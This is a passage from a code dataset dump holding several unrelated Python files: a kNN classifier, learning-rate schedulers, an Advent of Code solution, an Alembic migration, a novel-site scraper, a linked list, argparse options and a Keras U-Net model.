#将字符串根据'\\t'分隔符进行切片。\n returnMat[index,:] = listFromLine[0:3] #数据的前三列特征值取出\n #根据文本中标记的喜欢的程度进行分类,1代表不喜欢,2代表魅力一般,3代表极具魅力\n if listFromLine[-1] == 'didntLike':\n classLabelVector.append(1)\n elif listFromLine[-1] == 'smallDoses':\n classLabelVector.append(2)\n elif listFromLine[-1] == 'largeDoses':\n classLabelVector.append(3)\n index += 1\n return returnMat, classLabelVector\n\n\"\"\"\n函数说明:可视化数据\n\ndatingDataMat : 特征矩阵\ndatingLabels :分类Label\n\n\"\"\"\ndef showdatas(datingDataMat, datingLabels):\n #设置汉字格式\n font = FontProperties(fname=r\"c:\\windows\\fonts\\simsun.ttc\", size=14)\n #将fig画布分隔成1行1列,不共享x轴和y轴,fig画布的大小为(13,8)\n 
#当nrow=2,nclos=2时,代表fig画布被分为四个区域,axs[0][0]表示第一行第一个区域\n fig, axs = plt.subplots(nrows=2, ncols=2,sharex=False, sharey=False, figsize=(13,8))\n\n \n LabelsColors = []\n for i in datingLabels:\n if i == 1:\n LabelsColors.append('black')\n if i == 2:\n LabelsColors.append('orange')\n if i == 3:\n LabelsColors.append('red')\n #画出散点图,以datingDataMat矩阵的第一(飞行常客例程)、第二列(玩游戏)数据画散点数据,散点大小为15,透明度为0.5\n axs[0][0].scatter(x=datingDataMat[:,0], y=datingDataMat[:,1], color=LabelsColors,s=15, alpha=.5)\n #设置标题,x轴label,y轴label\n axs0_title_text = axs[0][0].set_title(u'每年获得的飞行常客里程数与玩视频游戏所消耗时间占比',FontProperties=font)\n axs0_xlabel_text = axs[0][0].set_xlabel(u'每年获得的飞行常客里程数',FontProperties=font)\n axs0_ylabel_text = axs[0][0].set_ylabel(u'玩视频游戏所消耗时间占',FontProperties=font)\n plt.setp(axs0_title_text, size=9, weight='bold', color='red') \n plt.setp(axs0_xlabel_text, size=7, weight='bold', color='black') \n plt.setp(axs0_ylabel_text, size=7, weight='bold', color='black')\n\n #画出散点图,以datingDataMat矩阵的第一(飞行常客例程)、第三列(冰激凌)数据画散点数据,散点大小为15,透明度为0.5\n axs[0][1].scatter(x=datingDataMat[:,0], y=datingDataMat[:,2], color=LabelsColors,s=15, alpha=.5)\n #设置标题,x轴label,y轴label\n axs1_title_text = axs[0][1].set_title(u'每年获得的飞行常客里程数与每周消费的冰激淋升数',FontProperties=font)\n axs1_xlabel_text = axs[0][1].set_xlabel(u'每年获得的飞行常客里程数',FontProperties=font)\n axs1_ylabel_text = axs[0][1].set_ylabel(u'每周消费的冰激淋升数',FontProperties=font)\n plt.setp(axs1_title_text, size=9, weight='bold', color='red') \n plt.setp(axs1_xlabel_text, size=7, weight='bold', color='black') \n plt.setp(axs1_ylabel_text, size=7, weight='bold', color='black')\n\n #画出散点图,以datingDataMat矩阵的第二(玩游戏)、第三列(冰激凌)数据画散点数据,散点大小为15,透明度为0.5\n axs[1][0].scatter(x=datingDataMat[:,1], y=datingDataMat[:,2], color=LabelsColors,s=15, alpha=.5)\n #设置标题,x轴label,y轴label\n axs2_title_text = axs[1][0].set_title(u'玩视频游戏所消耗时间占比与每周消费的冰激淋升数',FontProperties=font)\n axs2_xlabel_text = axs[1][0].set_xlabel(u'玩视频游戏所消耗时间占比',FontProperties=font)\n axs2_ylabel_text = 
axs[1][0].set_ylabel(u'每周消费的冰激淋升数',FontProperties=font)\n plt.setp(axs2_title_text, size=9, weight='bold', color='red') \n plt.setp(axs2_xlabel_text, size=7, weight='bold', color='black') \n plt.setp(axs2_ylabel_text, size=7, weight='bold', color='black')\n #设置图例\n didntLike = mlines.Line2D([], [], color='black', marker='.',\n markersize=6, label='didntLike')\n smallDoses = mlines.Line2D([], [], color='orange', marker='.',\n markersize=6, label='smallDoses')\n largeDoses = mlines.Line2D([], [], color='red', marker='.',\n markersize=6, label='largeDoses')\n #添加图例\n axs[0][0].legend(handles=[didntLike,smallDoses,largeDoses])\n axs[0][1].legend(handles=[didntLike,smallDoses,largeDoses])\n axs[1][0].legend(handles=[didntLike,smallDoses,largeDoses])\n #显示图片\n plt.show()\n\n\"\"\"\n函数说明:对数据进行归一化\n\ndataSet:特征矩阵\n\nnormDataSet : 归一化后的特征矩阵\nranges : 数据范围\nminVals: 数据最小值\n\"\"\"\n\ndef autoNorm(dataSet):\n minVals = dataSet.min(0)\n maxVals = dataSet.max(0)\n ranges = maxVals - minVals\n normDataSet = np.zeros(np.shape(dataSet))\n m = dataSet.shape[0]\n normDataSet = dataSet - np.tile(minVals, (m, 1))\n normDataSet = normDataSet / np.tile(ranges, (m, 1))\n return normDataSet, ranges, minVals\n\"\"\"\n函数说明:k-近邻算法\n\ninX : 用于分类的数据(测试集)\ndataSet : 用于训练的数据(训练集)\nlabes : 分类标签\nk : kNN算法参数,选择距离最小的k个点\n\nsortedClassCount[0][0] : 分类结果\n\n\"\"\"\ndef classify0(inX, dataSet, labels, k):\n #numpy函数shape[0]返回dataSet的行数\n dataSetSize = dataSet.shape[0]\n #在列向量方向上重复inX共1次(横向),行向量方向上重复inX共dataSetSize次(纵向)\n diffMat = np.tile(inX, (dataSetSize, 1)) - dataSet\n #二维特征相减后平方\n sqDiffMat = diffMat**2\n #sum()所有元素相加,sum(0)列相加,sum(1)行相加\n sqDistances = sqDiffMat.sum(axis=1)\n #开方,计算出距离\n distances = sqDistances**0.5\n #返回distances中元素从小到大排序后的索引值\n sortedDistIndices = distances.argsort()\n #定一个记录类别次数的字典\n classCount = {}\n for i in range(k):\n #取出前k个元素的类别\n voteIlabel = labels[sortedDistIndices[i]] \n #dict.get(key,default=None),字典的get()方法,返回指定键的值,如果值不在字典中返回默认值。\n #计算类别次数\n classCount[voteIlabel] = 
classCount.get(voteIlabel,0) + 1\n sortedClassCount = sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)\n #返回次数最多的类别,即所要分类的类别\n return sortedClassCount[0][0]\n\n\n \nif __name__==\"__main__\":\n# filename = \"datingTestSet.txt\"\n# #打开并处理数据\n# datingDataMat, datingLabels = file2matrix(filename)\n# #showdatas(datingDataMat, datingLabels)\n# normDataSet, ranges, minVals = autoNorm(datingDataMat)\n filename = \"datingTestSet.txt\"\n #将返回的特征矩阵和分类向量分别存储到datingDataMat和datingLabels中\n datingDataMat, datingLabels = file2matrix(filename)\n showdatas(datingDataMat, datingLabels)\n #取所有数据的百分之十\n hoRatio = 0.10\n #数据归一化,返回归一化后的矩阵,数据范围,数据最小值\n normMat, ranges, minVals = autoNorm(datingDataMat)\n #获得normMat的行数\n m = normMat.shape[0]\n #百分之十的测试数据的个数\n numTestVecs = int(m * hoRatio)\n #分类错误计数\n errorCount = 0.0\n\n for i in range(numTestVecs):\n #前numTestVecs个数据作为测试集,后m-numTestVecs个数据作为训练集\n classifierResult = classify0(normMat[i,:], normMat[numTestVecs:m,:],\n datingLabels[numTestVecs:m], 4)\n print(\"分类结果:%d\\t真实类别:%d\" % (classifierResult, datingLabels[i]))\n if classifierResult != datingLabels[i]:\n errorCount += 1.0\n print(\"错误率:%f%%\" %(errorCount/float(numTestVecs)*100))\n\n","repo_name":"201066/lihang","sub_path":"KNN1.py","file_name":"KNN1.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"33146247951","text":"#!/usr/bin/python\r\n\r\n\"\"\" Defines reusable menu's for Qt applications \"\"\"\r\n\r\n# define authorship information\r\n__authors__ = ['Eric Hulser']\r\n__author__ = ','.join(__authors__)\r\n__credits__ = []\r\n__copyright__ = 'Copyright (c) 2011, Projex Software'\r\n__license__ = 'LGPL'\r\n\r\n# maintanence information\r\n__maintainer__ = 'Projex Software'\r\n__email__ = 
'team@projexsoftware.com'\r\n\r\n#------------------------------------------------------------------------------","repo_name":"bitesofcode/projexui","sub_path":"projexui/menus/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"33"} +{"seq_id":"4233614065","text":"def constant_scheduler(value):\n while True:\n yield value\n\n\ndef exponential_scheduler(init_value, decay):\n \"\"\" Decreases exponentially \"\"\"\n\n value = init_value\n while True:\n yield value\n value *= decay\n\n\ndef linear_scheduler_up(init_value, target_value, duration):\n \"\"\" Increases linearly and then stays flat \"\"\"\n\n value = init_value\n t = 0\n while True:\n yield value\n t += 1\n if t < duration:\n value = init_value + t * (target_value - init_value) / duration\n else:\n value = target_value\n\n\ndef linear_scheduler_up_down(init_value, target_value, final_value,\n duration_up, t_decrease, duration_down):\n \"\"\" Increases linearly to target_value, stays at target_value until\n t_decrease and then decreases linearly\n \"\"\"\n\n value = init_value\n t = 0\n\n while True:\n yield value\n t += 1\n if t < duration_up:\n value = init_value + t * (target_value - init_value) / \\\n float(duration_up)\n elif t > t_decrease:\n value = target_value - (t - t_decrease) * \\\n (target_value - final_value) / \\\n float(duration_down)\n else:\n value = target_value\n","repo_name":"hannes-brt/hebel","sub_path":"hebel/schedulers.py","file_name":"schedulers.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":1170,"dataset":"github-code","pt":"33"} +{"seq_id":"17687452788","text":"#! 
/usr/bin/python\nimport sys, getopt\n\ndef solve_star1():\n signal = read_file()[0]\n pos = 4\n while True:\n pos += 1\n if len(set(signal[pos - 4 : pos])) == 4:\n return pos\ndef solve_star2():\n signal = read_file()[0]\n pos = 14\n while True:\n pos += 1\n if len(set(signal[pos - 14 : pos])) == 14:\n return pos\n\n\ndef read_file():\n with open(file_dir + \"/\" + infile) as file:\n return [line.strip() for line in file]\n\n\nif __name__ == \"__main__\":\n infile = sys.argv[0][0:-2] + \"in\"\n file_dir = \"input_files\"\n star = 1\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"12ti:\")\n except getopt.GetoptError:\n print(\"day_.py [12t] [-i ]\")\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == \"-i\":\n infile = arg\n elif opt == \"-1\":\n star = 1\n elif opt == \"-2\":\n star = 2\n if opt == \"-t\":\n file_dir = \"test_files\"\n\n if star == 1:\n print(solve_star1())\n elif star == 2:\n print(solve_star2())\n","repo_name":"Wildst/AdventOfCode","sub_path":"2022/day_06.py","file_name":"day_06.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18396574532","text":"\"\"\"empty message\n\nRevision ID: 26b1831151f9\nRevises: 6b3cd4c690fc\nCreate Date: 2021-01-12 03:22:44.646056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '26b1831151f9'\ndown_revision = '6b3cd4c690fc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('hospital', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=True)\n op.drop_column('hospital', 'contrasena')\n op.drop_column('medico', 'contrasena')\n op.alter_column('paciente', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=True)\n op.alter_column('paciente', 'verificaion',\n existing_type=sa.BOOLEAN(),\n nullable=True)\n op.drop_column('paciente', 'contrasena')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('paciente', sa.Column('contrasena', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.alter_column('paciente', 'verificaion',\n existing_type=sa.BOOLEAN(),\n nullable=False)\n op.alter_column('paciente', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=False)\n op.add_column('medico', sa.Column('contrasena', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.add_column('hospital', sa.Column('contrasena', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.alter_column('hospital', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"joscanoga/gestion-de-historia-clinica-centralizada","sub_path":"migrations/versions/26b1831151f9_.py","file_name":"26b1831151f9_.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30792269296","text":"import re\n\nimport cchardet\nimport requests\nfrom selenium import webdriver\nfrom tqdm import tqdm\n\nfrom qimaowang.classes.ThreadPool import ThreadPool\n\nul_pattern = re.compile('', re.DOTALL)\nid_pattern = re.compile('')\n\n\ndef get_cookie():\n url = \"https://www.qimao.com/shuku/a-a-a-a-a-a-a-click-1/\"\n driver = webdriver.Chrome()\n driver.get(url)\n cookies = driver.get_cookies()\n return cookies\n\n\ndef get_session(cookies):\n headers = {\n \"Referer\": 
\"https://www.qimao.com/\",\n \"Host\": \"www.qimao.com\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Cache-Control\": \"max-age=0\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36\"\n }\n session = requests.Session()\n session.headers = headers\n for item in cookies:\n session.cookies.set(item[\"name\"], item[\"value\"])\n return session\n\n\ndef crawl(url, session):\n try:\n r = session.get(url, timeout=12)\n r.raise_for_status()\n encoding = cchardet.detect(r.content)\n r.encoding = encoding[\"encoding\"]\n return r.text\n except Exception as e:\n print(e)\n return \"\"\n\n\ndef get_novel_id(session):\n pages = 666\n url_pattern = \"https://www.qimao.com/shuku/a-a-a-a-a-a-a-click-{}/\"\n id_list = list()\n for i in tqdm(range(pages)):\n html = crawl(url_pattern.format(str(i + 1)), session)\n # time.sleep(0.5)\n if html != \"\":\n ul_tag = ul_pattern.findall(html)\n if len(ul_tag) > 0:\n # id_t = id_pattern.findall(ul_tag[0])\n # print(\"第\" + str(i) + \"页\" + str(len(id_t)))\n id_list.extend(id_pattern.findall(ul_tag[0]))\n return id_list\n\n\ndef main():\n cookies = get_cookie()\n session = get_session(cookies)\n thread_pool = ThreadPool(thread_num=4, cookies=cookies)\n id_list = get_novel_id(session)\n session.close()\n for id_t in id_list:\n thread_pool.put_task(id_t)\n thread_pool.create_and_start_thread()\n thread_pool.wait_all_task_done()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nettik/spiders","sub_path":"internet novel info/qimaowang/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28843765196","text":"class 
Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n self.previous = None\r\n\r\nclass doublyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n def append(self, data):\r\n if self.head is None:\r\n new_node = Node(data)\r\n new_node.previous = None\r\n self.head = new_node\r\n else:\r\n new_node = Node(data)\r\n cur = self.head\r\n while cur.next:\r\n cur = cur.next\r\n cur.next = new_node\r\n new_node.previous = cur\r\n new_node.next = None\r\n def prepend(self, data):\r\n if self.head is None:\r\n new_node = Node(data)\r\n new_node.previous = None\r\n self.head = new_node\r\n else:\r\n new_node = Node(data)\r\n self.head.previous = new_node\r\n new_node.next = self.head\r\n self.head = new_node\r\n new_node.previous = None\r\n def print_list(self):\r\n cur = self.head\r\n while cur:\r\n print(cur.data)\r\n cur = cur.next\r\n def add_after_node(self, key, data):\r\n cur = self.head\r\n while cur:\r\n if cur.next is None and cur.data == key:\r\n self.append(data)\r\n return\r\n elif cur.data == key:\r\n new_node = Node(data)\r\n nxt = cur.next\r\n cur.next = new_node\r\n new_node.previous = cur\r\n new_node.next = nxt\r\n nxt.previous = new_node\r\n cur = cur.next\r\n def add_before_node(self, key, data):\r\n cur = self.head\r\n while cur:\r\n if cur.previous is None and cur.data == key:\r\n self.prepend(data)\r\n return\r\n elif cur.data == key:\r\n new_node = Node(data)\r\n prev = cur.previous\r\n prev.next = new_node\r\n new_node.previous = prev\r\n new_node.next = cur\r\n cur.previous = new_node\r\n cur = cur.next\r\n def delete(self, key):\r\n cur = self.head\r\n while cur:\r\n if cur.data == key and cur == self.head:\r\n # Case 1\r\n if not cur.next:\r\n cur = None\r\n self.head = None\r\n return\r\n # Case 2\r\n else:\r\n nxt = cur.next\r\n cur.next = None\r\n nxt.previous = None\r\n cur = None\r\n self.head = nxt\r\n return\r\n elif cur.data == key:\r\n # Case 3\r\n if cur.next:\r\n nxt = 
cur.next\r\n prev = cur.previous\r\n prev.next = nxt\r\n nxt.previous = prev\r\n cur.next = None\r\n cur.previous = None\r\n cur = None\r\n return\r\n # Case 4\r\n else:\r\n prev = cur.previous\r\n prev.next = None\r\n cur.previous = None\r\n cur = None\r\n return\r\n cur = cur.next\r\n def reverse(self):\r\n tmp = None\r\n cur = self.head\r\n while cur:\r\n tmp = cur.previous\r\n cur.previous = cur.next\r\n cur.next = tmp\r\n cur = cur.previous\r\n if tmp:\r\n self.head = tmp.previous\r\ndlist = doublyLinkedList()\r\ndlist.append(1)\r\ndlist.append(2)\r\ndlist.append(3)\r\ndlist.append(4)\r\ndlist.prepend(0)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.add_after_node(2, 5)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.add_before_node(2, 6)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.delete(6)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.reverse()\r\ndlist.print_list()\r\n","repo_name":"Hariraj1029/DSA","sub_path":"d_linkedList.py","file_name":"d_linkedList.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31129092266","text":"import argparse\n\nimport consts\nimport params\n\n\ndef set_default_path_str(opts):\n user = 'rahul'\n env = 'local'\n dataset_path_str, output_path_str = './data', './output'\n if user == 'rahul':\n if env == 'local':\n dataset_path_str = f'./data/setcover/data/1000_1000/'\n output_path_str = f'./data/setcover/output/1000_10001/'\n elif env == 'cc':\n dataset_path_str = '/scratch/rahulpat/l2b/setcover/data/1000_1000/'\n output_path_str = '/scratch/rahulpat/l2b/setcover/output/1000_1000/'\n elif user == 'md':\n # TODO: set relevant paths\n pass\n\n opts.dataset = dataset_path_str\n opts.output = output_path_str\n\n\ndef get_options(args=None):\n parser = argparse.ArgumentParser(\n description=\"Options for learning to branch\"\n )\n\n parser.add_argument(\n \"--mode\",\n type=int,\n default=consts.BRANCHING,\n help=\"Generate 
optimal solution, train meta model or do branching\"\n )\n\n parser.add_argument(\n \"--parallel\",\n type=int,\n default=0,\n help=\"Flag to control solving instances in parallel\"\n )\n\n parser.add_argument(\n \"--timelimit\",\n type=int,\n default=200,\n help=\"Solver timelimit in seconds\"\n )\n\n parser.add_argument(\n \"--dataset\",\n type=str,\n help=\"Folder containing lp files of training instances\",\n )\n\n parser.add_argument(\n \"--output\",\n type=str,\n default='./',\n help=\"Folder to the dump the results\"\n )\n\n parser.add_argument(\n \"--strategy\",\n help=\"Branching strategy for solving mip\",\n type=int,\n default=consts.BS_PC\n )\n\n parser.add_argument(\n \"--max_iterations\",\n help=\"Maximum iterations for LP\",\n type=int,\n default=50\n )\n\n parser.add_argument(\n \"--theta\",\n help=\"Number of data samples collected while training meta model\",\n type=int,\n default=params.THETA\n )\n\n parser.add_argument(\n \"--theta2\",\n help=\"Number of data samples collected after warm-starting with meta model\",\n type=int,\n default=params.THETA2\n )\n\n parser.add_argument(\n \"--warm_start\",\n help=\"warm_start setting: 0: no warm-start, 1: averaging, 2: incremental training\",\n type=int,\n default=consts.NONE\n )\n\n parser.add_argument(\n \"--beta\",\n help=\"Number of instances used for training meta-model\",\n type=int,\n default=params.BETA\n )\n\n parser.add_argument(\n \"--instance\",\n help=\"Path to instance lp file\",\n type=str\n )\n # default = \"/scratch/rahulpat/setcover/train/1000_1000/1000_1000_0.lp\"\n\n parser.add_argument(\n \"--seed\",\n help=\"Seed for CPLEX\",\n type=int,\n default=3\n )\n opts = parser.parse_args(args)\n\n if opts.dataset is None:\n set_default_path_str(opts)\n\n return 
opts\n","repo_name":"alomrani/learning-to-branch","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"26969026182","text":"import skimage.transform as trans\nimport numpy as np\nimport keras\nimport tensorflow as tf\n\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\n\nfrom keras.models import *\nfrom keras.layers import *\n\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau,EarlyStopping\nfrom keras import backend as keras\n\ndef unet_sigmoid(pretrained_weights = None,input_size = (256,256,3)):\n from keras.models import Model, load_model, save_model\n from keras.layers import Input, Dropout, BatchNormalization, Activation, Add\n from keras.layers.core import Lambda\n from keras.layers.convolutional import Conv2D, Conv2DTranspose\n from keras.layers.pooling import MaxPooling2D\n from keras.layers.merge import concatenate\n from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n from keras import backend as K\n from keras import optimizers\n import tensorflow as tf\n from keras.preprocessing.image import array_to_img, img_to_array, load_img\n\n def BatchActivate(x):\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n return x\n\n def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True):\n x = Conv2D(filters, size, strides=strides, padding=padding)(x)\n if activation==True: x = BatchActivate(x)\n return x\n\n def residual_block(blockInput, num_filters=16, batch_activate=False):\n x = BatchActivate(blockInput)\n x = convolution_block(x, num_filters, (3,3))\n x = convolution_block(x, num_filters, (3,3), activation=False)\n x = Add()([x, blockInput])\n if batch_activate: x = BatchActivate(x)\n return x\n\n # Build Model\n def 
build_model(input_layer, start_neurons, DropoutRatio=0.5):\n # 101 -> 50\n conv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(input_layer)\n conv1 = residual_block(conv1, start_neurons*1)\n conv1 = residual_block(conv1, start_neurons*1, True)\n pool1 = MaxPooling2D((2,2))(conv1)\n pool1 = Dropout(DropoutRatio/2)(pool1)\n \n # 50 -> 25\n conv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(pool1)\n conv2 = residual_block(conv2, start_neurons*2)\n conv2 = residual_block(conv2, start_neurons*2, True)\n pool2 = MaxPooling2D((2,2))(conv2)\n pool2 = Dropout(DropoutRatio)(pool2)\n \n # 25 -> 12\n conv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(pool2)\n conv3 = residual_block(conv3, start_neurons*4)\n conv3 = residual_block(conv3, start_neurons*4, True)\n pool3 = MaxPooling2D((2,2))(conv3)\n pool3 = Dropout(DropoutRatio)(pool3)\n \n # 12 -> 6\n conv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(pool3)\n conv4 = residual_block(conv4, start_neurons*8)\n conv4 = residual_block(conv4, start_neurons*8, True)\n pool4 = MaxPooling2D((2,2))(conv4)\n pool4 = Dropout(DropoutRatio)(pool4)\n \n # Middle\n convm = Conv2D(start_neurons*16, (3,3), activation=None, padding='same')(pool4)\n convm = residual_block(convm, start_neurons*16)\n convm = residual_block(convm, start_neurons*16, True)\n \n # 6 -> 12\n deconv4 = Conv2DTranspose(start_neurons*8, (3,3), strides=(2,2), padding='same')(convm)\n uconv4 = concatenate([deconv4, conv4])\n uconv4 = Dropout(DropoutRatio)(uconv4)\n \n uconv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(uconv4)\n uconv4 = residual_block(uconv4, start_neurons*8)\n uconv4 = residual_block(uconv4, start_neurons*8, True)\n \n # 12 -> 25\n deconv3 = Conv2DTranspose(start_neurons*4, (3,3), strides=(2,2), padding='same')(uconv4)\n print(f\"deconv3 {deconv3.shape} - {start_neurons*4}\")\n print(f\"conv3 {conv3.shape}\")\n uconv3 = concatenate([deconv3, conv3])\n 
uconv3 = Dropout(DropoutRatio)(uconv3)\n \n uconv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(uconv3)\n uconv3 = residual_block(uconv3, start_neurons*4)\n uconv3 = residual_block(uconv3, start_neurons*4, True)\n \n # 25 -> 50\n deconv2 = Conv2DTranspose(start_neurons*2, (3,3), strides=(2,2), padding='same')(uconv3)\n uconv2 = concatenate([deconv2, conv2])\n uconv2 = Dropout(DropoutRatio)(uconv2)\n \n uconv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(uconv2)\n uconv2 = residual_block(uconv2, start_neurons*2)\n uconv2 = residual_block(uconv2, start_neurons*2, True)\n \n # 50 -> 101\n deconv1 = Conv2DTranspose(start_neurons*1, (3,3), strides=(2,2), padding='same')(uconv2)\n uconv1 = concatenate([deconv1, conv1])\n uconv1 = Dropout(DropoutRatio)(uconv1)\n \n uconv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(uconv1)\n uconv1 = residual_block(uconv1, start_neurons*1)\n uconv1 = residual_block(uconv1, start_neurons*1, True)\n \n output_layer_noActi = Conv2D(1, (1,1), padding='same', activation=None)(uconv1)\n output_layer = Activation('sigmoid')(output_layer_noActi)\n \n return output_layer\n\n\n input_layer = Input(input_size)\n output_layer = build_model(input_layer, 16,0.5)\n\n model1 = Model(input_layer, output_layer)\n\n c = optimizers.adam(lr = 0.005)\n #model1.compile(loss=\"binary_crossentropy\", optimizer=c, metrics=[my_iou_metric])\n model1.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n #model1.summary()\n\n if(pretrained_weights):\n print(f\"MODEL LOADED {pretrained_weights}\")\n model1.load_weights(pretrained_weights)\n\n return model1\n\n\n\n\n\n\n\n###############################################OLD#############################\ndef unet_sigmoid_Old(pretrained_weights = None,input_size = (256,256,3)):\n inputs = Input(input_size)\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)\n conv1 = 
Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))\n merge6 = concatenate([drop4,up6], axis = 3)\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv6)\n\n up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))\n merge7 = concatenate([conv3,up7], axis = 3)\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv7)\n\n up8 = Conv2D(128, 2, 
activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))\n merge8 = concatenate([conv2,up8], axis = 3)\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv8)\n\n up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))\n merge9 = concatenate([conv1,up9], axis = 3)\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation = 'sigmoid')(conv9)\n\n model = Model(input = inputs, output = conv10)\n\n model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n #model.summary()\n\n if(pretrained_weights):\n print(f\"MODEL LOADED {pretrained_weights}\")\n model.load_weights(pretrained_weights)\n return 